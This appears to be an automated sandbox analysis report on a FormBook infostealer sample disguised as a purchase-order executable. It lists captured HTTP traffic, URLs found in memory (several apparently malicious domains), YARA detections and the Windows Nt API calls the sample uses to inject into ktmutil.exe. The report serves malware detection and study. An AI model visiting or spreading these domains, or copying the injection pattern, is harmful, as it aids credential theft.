Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:55:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qPllvBXjyILmBcY2IsYChkU2UmD33cUcTXqYbYDa%2BrJnK90%2FYyHjcT%2Bt2zOn9VTYyZrAmifeayLrrh6lqtXBi2igDSMkS1hxipe2zQ8j%2FM7dba0aaUNKC9yl1KxFHCj4sbZi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9309893f39807bc0-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=111905&min_rtt=111905&rtt_var=55952&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 03 67 d2 d0 d6 96 d0 a1 65 0c 15 4c ca 97 bf 0a e1 0f 97 10 32 83 3d 97 90 15 a7 4d ef 22 31 39 5b ca 36 3a b3 63 ac 80 9d 2f e1 2e 9d 32 41 d7 e2 4d f2 0d ce ad d6 f9 e5 c4 27 4d 20 89 92 45 fa 0f cb 7c 3d d1 1a b2 f8 e4 f1 69 6b c2 ec 4f 5b ad 33 aa 9a 37 85 28 ea a5 ce 53 51 ad 5e 93 66 c9 89 24 6c f5 4c 0d 77 69 3d 6f 5e d5 85 5e 35 b3 da 37 0f 1a 21 60 74 bb d0 a5 c9 bf 3b 8c 8c 0a 3a b7 33 0a ac 63 68 11 fa 64 03 ce 02 6b 8a 10 Data Ascii: 2d6dTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:55:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NZmi8k6s5UYZjSebyEtohnpZnEFm2o77q022l4kJ%2BKEt2weoHzPZMJaXN%2FolsfPz8SKAALnMrUkjemilm3jpD4tlHXL5FzolPwyni%2FF3dx8Cqw4M2vPjRCX9ra2kK2MdmsNW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9309894fdbb453ea-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=107430&min_rtt=107430&rtt_var=53715&sent=2&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=6995&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 9b a5 d0 85 78 23 67 1d 7a d8 8e 69 b9 bb 72 07 a5 b7 d0 85 a3 1f 65 6b 1c 0d 2b 4b 3a 69 e2 24 57 fa df 0f 39 c9 be b4 12 c8 92 fc cc a3 99 67 46 aa af 7e ff fb b7 87 af f7 7f 80 e6 c1 34 b3 3a 7d 20 f2 d1 e0 66 ae 91 b6 9a cb 5c 88 37 f3 f4 0b a5 6a 66 f5 80 2c c1 ca 01 37 f3 91 70 ef 5d e0 39 74 ce 32 5a de cc f7 a4 58 6f 14 8e d4 61 36 2d 16 40 96 98 a4 c9 62 27 0d 6e f2 05 44 1d c8 3e 66 ec b2 9e 78 63 5d 62 67 62 83 0d 14 a2 80 cf 8e e1 a3 db 59 f5 cb ac 5e 9e f6 eb c9 a5 e6 fd 80 8a 24 bc f5 01 7b 0c 31 eb 9c 71 21 8b 9d c6 01 4b 25 c3 e3 cd b7 d6 a9 e3 b7 56 76 8f db 90 28 4e 90 f2 5a 08 71 45 43 72 56 5a fe fe bd 5e 9e 08 eb e5 39 aa 64 76 89 fb 64 02 d7 45 51 54 30 c8 b0 25 5b 8a aa 77 96 4b b0 2e 0c d2 40 5e f8 c3 72 25 fc 01 3e 04 92 66 01 7f a2 19 91 a9 93 0b 88 d2 c6 2c 62 a0 be 82 17 12 56 f0 93 57 70 dd f7 7d 95 a2 57 34 fe a0 ba dc b1 ab 60 20 9b bd e2 98 37 90 da 4b 03 c6 03 67 d2 d0 d6 96 d0 a1 65 0c 15 4c ca 97 bf 0a e1 0f 97 10 32 83 3d 97 90 15 a7 4d ef 22 31 39 5b ca 36 3a b3 63 ac 80 9d 2f e1 2e 9d 32 41 d7 e2 4d f2 0d ce ad d6 f9 e5 c4 27 4d 20 89 92 45 fa 0f cb 7c 3d d1 1a b2 f8 e4 f1 69 6b c2 ec 4f 5b ad 33 aa 9a 37 85 28 ea a5 ce 53 51 ad 5e 93 66 c9 89 24 6c f5 4c 0d 77 69 3d 6f 5e d5 85 5e 35 b3 da 37 0f 1a 21 60 74 bb d0 a5 c9 bf 3b 8c 8c 0a 3a b7 33 0a ac 63 68 11 fa 64 03 ce 02 6b 8a 10 31 Data Ascii: 2d6dTm80x#gzirek+K:i$W9gF~4:} f\7jf,7p]9t2ZXoa6-@b'nD>fxc]bgbY^${1q!K%Vv(NZqECrVZ^9dvdEQT0%[wK.@^r%>f,bVWp}W4` 7KgeL2=M"19[6:c/.2AM'M E\|=ikO[37(SQ^f$lLwi=o^^57!`t;:3chdk1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 06:55:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RlOEEZkfVNEZTMDYan%2FmUxLfJM695hcjkeeLuJwGUHz3OYHXT1AwSUb58EM%2FQuXg4kynFeEDyBQMwJ4oNBwymSdiJOV1A%2BfyF81xecm7BMgFzzTbILU1ZmGjKAhSl%2BVhYUZw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 93098960685ee592-ATLalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106327&min_rtt=106327&rtt_var=53163&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=454&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Source: ktmutil.exe, 00000004.00000002.3640307217.000000000405C000.00000004.10000000.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3639344553.00000000039AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.aibay.top/k12w/?Bz=I6te/k1lbUDv9lUmInG92Y4ZLnEsH0cpjuyXjkObmr6KGlNEilnQgEy9r5056f7AXw2PFR
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3641351972.0000000005416000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.skingraphica.net
Source: kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3641351972.0000000005416000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.skingraphica.net/8u15/
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Details Of Our PO..exe, 00000000.00000002.1207718181.00000000098B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: ktmutil.exe, 00000004.00000002.3636898857.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ktmutil.exe, 00000004.00000002.3636898857.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10330
Source: ktmutil.exe, 00000004.00000002.3636898857.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ktmutil.exe, 00000004.00000003.1489463452.0000000007825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: ktmutil.exe, 00000004.00000002.3640307217.0000000003A14000.00000004.10000000.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3639344553.0000000003364000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1604400830.000000003E164000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.3333bet.website
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: ktmutil.exe, 00000004.00000002.3642564016.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, ktmutil.exe, 00000004.00000002.3640307217.0000000005010000.00000004.10000000.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3639344553.0000000004960000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: ktmutil.exe, 00000004.00000003.1499092324.0000000007858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: ktmutil.exe, 00000004.00000002.3640307217.0000000004CEC000.00000004.10000000.00040000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3639344553.000000000463C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.mbalib.com/ysql/?oxr=vzuH8N7P9nf&Bz=MK

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.Details Of Our PO..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Details Of Our PO..exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3639234599.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3641351972.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3636731674.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1306921757.0000000001290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1304498095.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3638939405.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3639012811.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1307125156.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B07D4 NtQueryInformationProcess,	0_2_012B07D4
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B60A0 NtQueryInformationProcess,	0_2_012B60A0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0042CD23 NtClose,	1_2_0042CD23
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F635C0 NtCreateMutant,LdrInitializeThunk,	1_2_00F635C0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62B60 NtClose,LdrInitializeThunk,	1_2_00F62B60
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_00F62C70
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_00F62DF0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F63090 NtSetValueKey,	1_2_00F63090
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F63010 NtOpenDirectoryObject,	1_2_00F63010
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F64340 NtSetContextThread,	1_2_00F64340
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F64650 NtSuspendThread,	1_2_00F64650
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F639B0 NtGetContextThread,	1_2_00F639B0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62AF0 NtWriteFile,	1_2_00F62AF0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62AD0 NtReadFile,	1_2_00F62AD0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62AB0 NtWaitForSingleObject,	1_2_00F62AB0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62BF0 NtAllocateVirtualMemory,	1_2_00F62BF0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62BE0 NtQueryValueKey,	1_2_00F62BE0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62BA0 NtEnumerateValueKey,	1_2_00F62BA0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62B80 NtQueryInformationFile,	1_2_00F62B80
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62CF0 NtOpenProcess,	1_2_00F62CF0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62CC0 NtQueryVirtualMemory,	1_2_00F62CC0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62CA0 NtQueryInformationToken,	1_2_00F62CA0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62C60 NtCreateKey,	1_2_00F62C60
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62C00 NtQueryInformationProcess,	1_2_00F62C00
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62DD0 NtDelayExecution,	1_2_00F62DD0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62DB0 NtEnumerateKey,	1_2_00F62DB0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F63D70 NtOpenThread,	1_2_00F63D70
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62D30 NtUnmapViewOfSection,	1_2_00F62D30
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62D10 NtMapViewOfSection,	1_2_00F62D10
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F63D10 NtOpenProcessToken,	1_2_00F63D10
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62D00 NtSetInformationFile,	1_2_00F62D00
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62EE0 NtQueueApcThread,	1_2_00F62EE0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62EA0 NtAdjustPrivilegesToken,	1_2_00F62EA0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62E80 NtReadVirtualMemory,	1_2_00F62E80
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62E30 NtWriteVirtualMemory,	1_2_00F62E30
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62FE0 NtCreateFile,	1_2_00F62FE0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62FB0 NtResumeThread,	1_2_00F62FB0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62FA0 NtQuerySection,	1_2_00F62FA0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62F90 NtProtectVirtualMemory,	1_2_00F62F90
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62F60 NtCreateProcessEx,	1_2_00F62F60
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F62F30 NtCreateSection,	1_2_00F62F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03074340 NtSetContextThread,LdrInitializeThunk,	4_2_03074340
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03074650 NtSuspendThread,LdrInitializeThunk,	4_2_03074650
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072B60 NtClose,LdrInitializeThunk,	4_2_03072B60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_03072BA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_03072BE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_03072BF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072AD0 NtReadFile,LdrInitializeThunk,	4_2_03072AD0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072AF0 NtWriteFile,LdrInitializeThunk,	4_2_03072AF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072F30 NtCreateSection,LdrInitializeThunk,	4_2_03072F30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072FB0 NtResumeThread,LdrInitializeThunk,	4_2_03072FB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072FE0 NtCreateFile,LdrInitializeThunk,	4_2_03072FE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_03072E80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_03072EE0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_03072D10
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_03072D30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072DD0 NtDelayExecution,LdrInitializeThunk,	4_2_03072DD0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_03072DF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072C60 NtCreateKey,LdrInitializeThunk,	4_2_03072C60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_03072C70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_03072CA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030735C0 NtCreateMutant,LdrInitializeThunk,	4_2_030735C0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_030739B0 NtGetContextThread,LdrInitializeThunk,	4_2_030739B0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072B80 NtQueryInformationFile,	4_2_03072B80
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072AB0 NtWaitForSingleObject,	4_2_03072AB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072F60 NtCreateProcessEx,	4_2_03072F60
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072F90 NtProtectVirtualMemory,	4_2_03072F90
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072FA0 NtQuerySection,	4_2_03072FA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072E30 NtWriteVirtualMemory,	4_2_03072E30
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072EA0 NtAdjustPrivilegesToken,	4_2_03072EA0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072D00 NtSetInformationFile,	4_2_03072D00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072DB0 NtEnumerateKey,	4_2_03072DB0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072C00 NtQueryInformationProcess,	4_2_03072C00
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072CC0 NtQueryVirtualMemory,	4_2_03072CC0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03072CF0 NtOpenProcess,	4_2_03072CF0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03073010 NtOpenDirectoryObject,	4_2_03073010
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03073090 NtSetValueKey,	4_2_03073090
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03073D10 NtOpenProcessToken,	4_2_03073D10
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_03073D70 NtOpenThread,	4_2_03073D70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_005293D0 NtCreateFile,	4_2_005293D0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00529540 NtReadFile,	4_2_00529540
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00529630 NtDeleteFile,	4_2_00529630
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_005296D0 NtClose,	4_2_005296D0
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4_2_00529830 NtAllocateVirtualMemory,	4_2_00529830

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B6568	0_2_012B6568
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B08C0	0_2_012B08C0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B0F60	0_2_012B0F60
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B6558	0_2_012B6558
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B3771	0_2_012B3771
